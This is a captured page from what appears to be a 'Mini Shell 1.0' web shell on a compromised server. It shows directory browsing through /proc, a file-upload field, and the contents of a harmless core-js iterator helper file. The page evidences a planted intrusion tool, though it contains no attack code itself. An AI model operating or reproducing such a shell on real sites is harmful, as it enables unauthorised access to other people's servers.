HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/1991109/cwd/usr/share/node_modules/core-js/internals/
Upload File :
Current File : //proc/1991109/cwd/usr/share/node_modules/core-js/internals/get-iterator-flattenable.js
var call = require('../internals/function-call');
var isCallable = require('../internals/is-callable');
var toObject = require('../internals/to-object');
var getIteratorDirect = require('../internals/get-iterator-direct');
var getIteratorMethod = require('../internals/get-iterator-method');

module.exports = function (obj) {
  var object = toObject(obj);
  var method = getIteratorMethod(object);
  return getIteratorDirect(isCallable(method) ? call(method, object) : object);
};